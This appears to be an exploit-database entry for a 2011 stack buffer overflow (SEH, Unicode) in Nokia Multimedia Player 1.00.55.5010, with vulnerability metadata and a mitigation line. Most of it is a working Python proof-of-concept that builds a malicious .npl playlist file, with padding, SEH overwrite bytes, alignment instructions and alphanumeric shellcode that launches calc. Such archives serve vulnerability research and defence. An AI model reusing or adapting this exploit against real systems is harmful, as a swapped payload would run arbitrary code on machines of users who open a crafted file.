Nokia Multimedia player SEH Unicode

vendor:

Multimedia Player

by:

Carlos Mario Penagos Hollmann

9.3

CVSS

HIGH

Buffer Overflow

119

CWE

Product Name: Multimedia Player

Affected Version From: 1.00.55.5010

Affected Version To: 1.00.55.5010

Patch Exists: YES

Related CWE: N/A

CPE: a:nokia:multimedia_player:1.00.55.5010

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows XP SP3

2011

Nokia Multimedia player SEH Unicode

A buffer overflow vulnerability exists in Nokia Multimedia Player 1.00.55.5010 due to improper bounds checking of user-supplied input. An attacker can exploit this vulnerability to execute arbitrary code in the context of the application. The vulnerability is due to a stack-based buffer overflow in the application when handling a specially crafted .NPL file. An attacker can exploit this vulnerability by enticing a user to open a specially crafted .NPL file.

Mitigation:

Upgrade to the latest version of Nokia Multimedia Player.

Source

Exploit-DB raw data:

# Exploit Title: Nokia Multimedia player  SEH Unicode
# Date: January 11 2011
# Author: Carlos Mario Penagos Hollmann
# Software Link: http://www.brothersoft.com/nokia-multimedia-player-download-46238.html
# Version: 1.00.55.5010
# Tested on: Windows xp sp3 running on VMware Fusion 3.1 and VirtualBox 3.2.8

 
#  mail----> shogilord^gmail.com spams are welcome!!!!! 
#    ________  _    _________   ____ __ _____   ________
#   / ____/ / | |  / / ____/ | / / //_//  _/ | / / ____/
#  / __/ / /  | | / / __/ /  |/ / ,<   / //  |/ / / __ 
# / /___/ /___| |/ / /___/ /|  / /| |_/ // /|  / /_/ / 
#/_____/_____/|___/_____/_/ |_/_/ |_/___/_/ |_/\____/  
 
# COLOMBIA hacking presents.............
#     
# Dont be afraid of unicode my young padawan 
# 
# Big Thanks to sud0 !!
#

junk="\x44" * 2660

shellcode = "PPYAIAIAIAIAIAIAIAIAIAIAIAIAIAIAjXAQADAZABARALAYAIAQAIAQAIAhAAAZ1AIAIAJ11AIAIABABABQI1AIQIAIQI111AIAJQYAZBABABABABkMAGB9u4JBdK8lPU4KjLS8o0mPO0LoQXc3QQPlpcdMa5YhnpVXgWRs920wkOXPA" #calc shellcode

nseh="\x61\xC5" 

align = "\x61\x6D\x61\x6D\x50\x6E\xC3" 


seh="\xEF\x42"

junk2="\xcc"*45

junk3="\xcc"*850

buff=junk+nseh+seh+align+junk2+shellcode+junk3

magic = open("Crash1234.npl","w")

magic.write(buff)

magic.close()